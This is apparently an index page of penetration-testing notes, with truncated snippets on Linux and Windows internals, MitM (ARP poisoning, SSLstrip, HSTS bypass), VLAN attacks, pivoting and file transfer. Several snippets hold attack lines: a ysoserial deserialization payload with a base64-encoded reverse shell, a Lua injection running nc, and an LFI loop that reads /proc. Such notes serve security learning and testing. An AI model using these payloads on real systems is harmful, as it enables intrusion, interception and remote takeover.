-
Show info: dpkg --info $package
Show all files of a deb: dpkg -L $package
Show all installed packages: dpkg -l
Search for a file or path: dpkg -S htpasswd
Show why a package was installed: aptitude why apache2-utils
About deb files
A deb file is an ar archive with this structure:
$ ar t example.deb
debian-binary
control.tar.xz (or .gz or…
-
Some notes:
Build your own Kali ISO image
apt install curl git live-build
git clone https://gitlab.com/kalilinux/build-scripts/live-build-config.git
cd live-build-config
...
./build.sh --verbose
This will create a custom ISO.
-
Other
-
The four process UIDs
For each process, Linux manages four UIDs. When a process of a user with UID 1000 is started/forked, the new process normally also has the UID 1000. However, with SUID/SGID it becomes more complicated, since processes can get other UIDs than the one of the caller. When a process like passwd…
-
Named pipes
A named pipe is a method for remote or local IPC (inter-process communication).
Basic commands
Where is a program? where ssh
Restart the system now: shutdown /r /t 0
Set file system attributes (which are shown with the dir command): attrib +r file.exe
Set file system permissions (which are shown with the icacls command):…
-
Get information from a (minified) JS file (e.g. from Angular):
-
(!) If the upload does not seem to work, change the suffix, e.g. from .php to .pHp. More: File uploads / images
-
First, try to determine the shell:
echo $PATH
echo $SHELL
Try to set the PATH variable:
export PATH=/usr/local/sbin:/usr/sbin:/sbin:/usr/local/bin:/usr/bin:/bin
Upload the escape_from_restricted_shell.c program (scripts directory). Have a look into a local bin directory and see if you can use any binary there to escape.
-
Assume you have a buffer overflow vulnerability. You can control the EIP, but your shellcode is never executed. Your shellcode is executed when a ret instruction is executed which jumps to the address you overwrote. But maybe the ret at the end of the function where the buffer overflow occurs is never reached, because you overwrote the…
-
SID Security Identifiers
All elements have attributes. They are identified via a Security Identifier (SID). The structure of a SID: Example: The Domain Identifier is the SID without the last RID part. Examples of well-known SIDs:
Basic Windows security access control
Security context
Mandatory Integrity Control and integrity levels
Windows (from Vista on) has five integrity levels:…
-
This page contains various unstructured notes about crypto-related things.
General notes
If you find somewhere that something should be random, but it isn't, this is already an important finding.
Stream ciphers
A stream cipher encrypts a cleartext bit by bit or character by character (normally via XOR) with a secret key. It produces a…
-
mitmdump is a proxy which can store and modify content.
Change content of a third-party site
Scenario: You want to manipulate some content from a website $target visits. Perform ARP poisoning with Bettercap, Ettercap, the http_hijack.py script or some other way. Start mitmdump in transparent mode:
mitmdump --mode transparent --replace /~s/wars/trek/
or alternatively to read the new content from a…
-
Bypass
HSTS is based on hostnames. If a target already visited www.supersite.example, you can try to redirect the target to a similar domain which the browser never visited before and thus doesn't have HSTS activated. Rewrite the Host HTTP header for the server you want to impersonate and add another character, e.g. wwww.supersite.example. You prepared…
-
SSLstrip works as a proxy which replaces HTTPS references in HTTP, HTML, JS, … responses with HTTP versions.
Installation: SSLstrip is old. Create a venv and install an older version of twisted:
venv/bin/pip install Twisted==18.9.0
Remove HTTPS references via MitM
Scenario: You want $target to route all HTTP traffic through your own system. Your system should remove each…
-
Socat
If Socat is not on the target system, upload a static binary. This will listen on port 5555 and forward it to the given IP on the given port deeper in the target's network:
socat -ddd TCP-LISTEN:5555,reuseaddr,fork TCP:10.4.247.215:5432
Proxychains
! If proxychains is slow, especially while port scanning, try to reduce the following parameters:…
-
This is an overview blog post.
MitM: Ettercap, Bettercap (L2), Scapy (L2), mitmdump (L3), Loki
Various VLAN attacks
NAC (Network admission control)
Other tools and notes: Use http_hijack.py (in the P151 script directory) to quickly set up a MitM. Check if you can see OSPF packets. Inspect them in Wireshark for the Auth Type field. If this is…
-
Definitions: A trunk connection is a connection between two switches.
Tools
Yersinia is a layer 2 modification framework. VoIPHopper is a simple tool which can sniff VoIP traffic and output the VLAN ID from the VoIP network:
voiphopper -c 0 -i eth0
Enumerate existing VLANs
Start Yersinia: yersinia -I
Press g
Select DTP
Press 5 to see…
-
Caution: Don't change the MAC address via a remote session, because of reasons…
Linux: ifconfig eth0 hw ether 00:01:02:03:04:05
Mac: ifconfig en0 ether 00:01:02:03:04:05
Windows: macshift, e.g.
-
Techniques which decide if a new device can join the normal or a special network. A captive portal forces a client to an authentication page. After authentication in a normal low-security environment (where you cannot assume preconfigured systems), the authentication is usually granted to a combination of MAC and IP. Therefore, try to sniff valid…
-
Malware
(Notes are taken from the TryHackMe course.)
John von Neumann (!) created a concept of malicious software in 1949. The first implementation was done in 1971 by Bob Thomas. The program Creeper jumped from one system (running the operating system Tenex) to another and just printed a message on each console. The team Nematode is…
-
If you can provide a serialized (.ser) file, try to create a payload directly if you have the source code, or just use a ysoserial payload.
java -jar ysoserial-master-SNAPSHOT.jar CommonsCollections4 "ping -c 4 192.168.49.175" > /tmp/recycler.ser
// Prepare a reverse shell command line and transform it into base64.
java -jar ysoserial-master-SNAPSHOT.jar CommonsCollections4 "bash -c {echo,YmFzaCAtaSA+JiAvZGV2L3RjcC8xOTIuMTY4LjQ5LjE3NS80NDQ0IDA+JjE=}|{base64,-d}|{bash,-i}"…
-
File and directory integrity levels
C:\Users\User>icacls hallo
hallo NT AUTHORITY\SYSTEM:(I)(F)
      BUILTIN\Administrators:(I)(F)
      WINDEV2012EVAL\User:(I)(F)
      Mandatory Label\High Mandatory Level:(NW)
(I)(F) means that the corresponding user or group has (F) Full permission on the file and that the permissions are (I) inherited from the parent directory. Note that the Read right (R) also enables execution on that file! (There…
-
Determine if the system has the WSL with bash:
where /R C:\windows bash.exe
If bash.exe is there and the WSL is running, then commands can be run as root (!) like:
C:\Windows\WinSxS\amd64_microsoft-windows-lxss-bash_31bf3856ad364e35_10.0.19041.423_none_1da742a41b53e164\bash.exe whoami
Install the WSL
To install the WSL, a system shell is required, unfortunately. See this article for installation.
-
Dumpzilla
Extracts the content of a profile directory. Download the profile directory. See what we have:
dumpzilla 84p8ofq6.default --Summary
Use the modules to see details.
-
Show all processes in a wide console: ps auxww
sudo = doas
-
https://www.syhunt.com/en/index.php?n=Articles.LuaVulnerabilities
Notes
A comment can be done with //. Add this after an injection:
index?file=bla');os.execute('nc...')--
-
Important notes
Copy+paste
For Linux:
base64 r > r.b64
...
base64 --decode -i r.b64 > r.tar
For Windows:
base64 p64.exe | sed 's/^\(.*\)$/echo \1 >> b64/g'
...
certutil -encode file.exe b64.txt
certutil -decode b64.txt file.exe
Alternative (Python 2):
python -c "open('test.b64','wb').write(open('test.txt').read().encode('base64'))"
...
python -c "open('test.txt','wb').write(open('test.b64').read().decode('base64'))"
Alternative:
python -m base64 -e test > test.b64
...
python -m base64…
-
After these steps, more things to do:
Work with processes
For enumeration of processes, see the Basic Windows system enumeration post.
Kill a process:
taskkill /PID $pid
taskkill /IM notepad.exe
pskill /accepteula $pid // With Sysinternals tools
Suspend and continue a running process with Sysinternals tools:
pssuspend /accepteula notepad.exe
...
pssuspend /accepteula -r notepad.exe
Work with DLLs
Show all…
-
For reverse engineering
Device name: Content
/proc/$pid/maps: Shows the memory mapping of a process. Includes all used libraries.
/proc/self/loginuid: Own UID.
Read processes
If you can read /proc via an LFI:
#!/bin/bash
for i in {1..1024}; do
  echo $i
  curl http://10.10.11.154/index.php\?page=/proc/$i/cmdline --output /tmp/proc/$i
done
Then, look in the /tmp/proc directory for files > 0 bytes.
Read environment of…